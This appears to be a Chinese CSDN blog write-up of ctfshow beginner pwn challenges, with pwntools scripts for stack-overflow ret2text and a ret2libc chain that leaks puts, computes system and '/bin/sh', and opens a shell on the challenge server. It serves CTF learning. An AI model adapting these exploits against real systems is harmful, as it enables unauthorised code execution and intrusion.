【ctfshow pwn入门】

最新推荐文章于 2025-08-17 03:25:58 发布
最新推荐文章于 2025-08-17 03:25:58 发布
阅读量715 收藏 9
点赞数 9
CC 4.0 BY-SA版权
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78931332/article/details/146129012

ctfshow pwn入门

前言

ctfshow pwn篇

PWN签到题

直接nc连接
在这里插入图片描述

pwn02

很经典的栈溢出
在这里插入图片描述checksec一下发现没有栈溢出保护

查看一下源码
在这里插入图片描述

跟进去
在这里插入图片描述
而且没有栈保护,所以是可以栈溢出的
在这里插入图片描述查看string,发现有/bin/sh命令,跟进查看地址
在这里插入图片描述

脚本

from pwn import *

context(os='linux',arch='i386',log_level='debug')
#io = process('./stack')
io = remote('pwn.challenge.ctf.show',28124)
#elf=ELF('./stack')
#backdoor = elf.sym['backdoor']
backdoor = 0x8048518

print(hex(backdoor))
offest = 13
payload = cyclic(offest) + p32(backdoor)
io.sendline(payload)
io.interactive()

pwn03

大致思路:第一次调用puts函数,触发指令调用动态链去查看lib库中puts函数的真实地址,然后把真实地址存储到got表中,然后输出puts函数的真实地址,获得puts函数的真实地址然后计算基地址,通过基地址来获取system函数和/bin/sh函数的地址 最终的payload = padding + system函数的地址 + 4(system函数的返回地址) + /bin/sh函数的地址

在这里插入图片描述
跟进去发现没有后门函数
在这里插入图片描述

from pwn import *
from LibcSearcher import *

io = remote('pwn.challenge.ctf.show',28146)
#连接靶机
elf = ELF('stack1')
#启动stack1程序
context.log_level = 'debug'


puts_plt = elf.plt['puts']
#获取puts函数在plt表上的地址
puts_got = elf.got['puts']
#获取puts函数在got表上的地址
start_addr = 0x080483C0
#main函数的地址
payload1 = b'A'*13 + p32(puts_plt) + p32(start_addr) + p32(puts_got)
#第一个payload,这样子会返回puts函数的真实地址
io.sendlineafter(b'32bits\n',payload1)
io.recv()
leak_addr = u32(io.recv(4))
#接收puts函数的真实返回地址
print(hex(leak_addr))
libc_base_addr = leak_addr - 0x67360
#基地址:puts函数真实地址-偏移量
system_addr = 0x3cd10 + libc_base_addr
#system函数真实地址 = 基地址+偏移量
bin_sh_addr = libc_base_addr + 0x17b8cf
#/bin/sh的真实地址
payload2 = b'B'*13 + p32(system_addr) + p32(1234) + p32(bin_sh_addr)

io.sendlineafter(b'32bits\n',payload2)
io.interactive()

pwn04

32位放进IDA查看
在这里插入图片描述
后面看wp完全看不懂,绷不住了,不做了

pwn05

数长度为16,但是实际大小只有14,很明显的栈溢出
在这里插入图片描述
这时候只要找/bin/sh就行
发现有个getflag函数是执行/bin/sh命令的
跟进去
在这里插入图片描述

exp:

from pwn import *

context(os='linux',arch='i386',log_level='debug')
#io = process('./stack')
io = remote('pwn.challenge.ctf.show', 28257)
#elf=ELF('./stack')
#backdoor = elf.sym['backdoor']
backdoor = 0x8048486

print(hex(backdoor))
offest = 0x14+4
payload = cyclic(offest) + p32(backdoor)
io.sendline(payload)
io.interactive()

pwn06

和上一道题差不多,但是因为它是64位的,所以要平衡栈堆,而且64位的程序ebp占8位

在这里插入图片描述
找到执行/bin/sh函数的地址

在这里插入图片描述
exp

from pwn import *

context(os='linux',arch='i386',log_level='debug')
#io = process('./stack')
io = remote('pwn.challenge.ctf.show', 28258)
#elf=ELF('./stack')
#backdoor = elf.sym['backdoor']
backdoor = 0x400577

print(hex(backdoor))
offest = 20
payload = cyclic(offest) + p64(0x40058E) + p64(backdoor)
#p64(0x40058E)用来平衡栈堆
io.sendline(payload)
io.interactive()
CTFshow-PWN-栈溢出(pwn65 详细版)
Welcome To Myon'Blog !
07-14 1301
摘要:该64位程序存在PIE保护,包含RWX段,通过read读取用户输入作为shellcode执行。程序会对输入字符进行严格检查,仅允许大小写字母、数字及部分符号(ASCII 48-90)。利用alpha3工具将原始shellcode编码为符合要求的ASCII字符,通过rax寄存器执行。最终成功获取flag:ctfshow{944db499-0c4a-4894-a0a5-3f7aeccec7de}。关键点包括字符过滤机制分析和alpha3编码技术的应用。
CTFshow PWN入门 pwn02
question55的博客
09-15 1169
ctf pwn 栈溢出漏洞 ctf入门 ctfshow
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 5553
本文主要详解CTFshowpwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
CTFshow-pwn入门-前置基础pwn13-pwn19
2301_80976241的博客
12-06 1392
题目提示我们使用gcc直接编译,然后运行可执行文件即可得到flag。因此我们gcc编译一下。得到flag:ctfshow{hOw_t0_us3_GCC?
CTFshow-pwn入门-前置基础pwn5 - pwn12
你们de4月天的博客
06-17 1622
CTFshow-pwn入门-前置基础-pwn5-pwn12
CTFshow-pwn入门-前置基础pwn23-pwn25
你们de4月天的博客
06-19 2552
CTFshow-pwn入门-前置基础pwn23-pwn25
CTFSHOW-PWN入门-前置基础(29-34)
2402_84585385的博客
08-03 1966
观察源代码发现printf函数输出了main函数的地址,我们用输出的地址减去main函数的地址就得到了偏移量,然后再用其他函数的地址加上偏移量,就能知道函数在内存中的地址了。进而我们可以利用puts函数输出got表中puts函数的地址,利用LibcSearcher模块得到puts函数在libc中的偏移,然后就能得到system函数和/bin/sh的地址了,最终拿到shell,得到flag。本题代码和上题一样,但是开启了fortify=1,仅仅在编译时检查,所以还是输入4个参数,得到flag。
ctfshow pwn入门
09-29
ctfshow pwn入门是一个关于ASLR(地址空间布局随机化)的题目。在该题目中,程序会读取系统中/proc/sys/kernel/randomize_va_space文件的内容,如果内容为0,则输出的flag是正确的,否则输出的flag是错误的。所以,...
ctfshow pwn入门20
03-19
好的,我现在需要帮助用户找到CTFShow平台上关于PWN入门的题解和教程。首先,用户提到了他们之前做过pwn02和pwn03,参考了相关的引用内容。我得先回忆一下CTFShowPWN题目的结构,通常入门题会从基础栈溢出开始,...
ctfshow pwn入门5打不开
03-12
### CTFShow PWN入门5无法打开的原因分析 当遇到CTFShow PWN入门5无法正常启动的情况时,通常是因为环境配置不正确或者依赖项缺失所引起的。如果在尝试运行过程中提示`application`和`inputfile`为空,并且焦点停留...
ctfshow pwn入门14
03-17
</think>### CTFShow PWN入门第14关解题思路 根据题目特征(结合引用[2]中提到的canary和PIE保护),以下是可能的解题步骤: 1. **检查安全机制** ```bash checksec pwn14 ``` 若输出显示`CANARY`和`PIE`启用...
CTFshow-pwn入门-栈溢出pwn49(静态链接pwn-mprotect函数的应用)
你们de4月天的博客
07-08 2217
ctfshow-pwn入门-栈溢出pwn49-mprotect函数静态链接pwn的应用
CTFshow-pwn入门-pwn100 WP
最新发布
weixin_44031316的博客
08-17 1293
在栈上的第二个位置,对于 printf 来说,rdi 是函数本身,第一个参数是 rsi,然后是 rdx、rcx、r8、r9,栈上第一个,栈上第二个的。原来正常返回的 main 函数某个地址和我们写入的后门地址都是在 elf 基址上计算的,高位相同。这里还在找后面地址在栈上的位置,所以这里的 1 是随便填的,hn 是写入两字节,对应地址后四位。的第一个参数,在调用 printf 时,寄存器会存 printf 的参数,会暂时把在。个,加上寄存器上的 5 个和栈上的第 0 个,是格式化字符串的第 17 个参数,
CTFshow-pwn入门-Test_your_nc
你们de4月天的博客
06-17 2878
ctfshow-pwn入门-test_your_nc-pwn0-pwn4
CTFshow-pwn入门-前置基础pwn32-pwn34
你们de4月天的博客
06-21 939
CTFshow-pwn入门-前置基础pwn32-pwn34
CTFSHOW-PWN入门-前置基础(pwn5-pwn12)
2402_84133101的博客
04-13 603
mov eax,[esi]将esi中的值作为地址,然后将该地址单元的值赋给eax,即找到080490E8地址单元中的值赋给eax。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov eax,[ecx]将ecx寄存器的值作为地址,将该地址单元中的值赋给eax。
CTFshow-pwn入门-前置基础pwn29-pwn31
你们de4月天的博客
06-21 2080
CTFshow-pwn入门-前置基础pwn29-pwn31(绕过PIE-pwn31)
CTFSHOW-PWN入门-前置基础(pwn13-pwn19)
2402_84133101的博客
04-14 507
如果不等于9就先执行real()函数,然后再执行system函数打印出flag,因此nc连接之后输入9,获得flag。IDA查看反汇编代码,看到case3有system(cat /ctfshow_flag)函数,但是sleep(0x1BF52u)语句要睡眠0x1BF52秒,换算成10进制就是114514秒,那就是31个小时,所以另求他法。使用gcc编译文件后,在当前目录下创建文件key,内容为CTFshow,运行编译后文件,获得flag。ld -s -o flag flag.o生成flag可执行文件。
CTFshow-pwn入门-前置基础pwn26-pwn28
你们de4月天的博客
06-20 1231
CTFshow-pwn入门-pwn26-pwn28
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值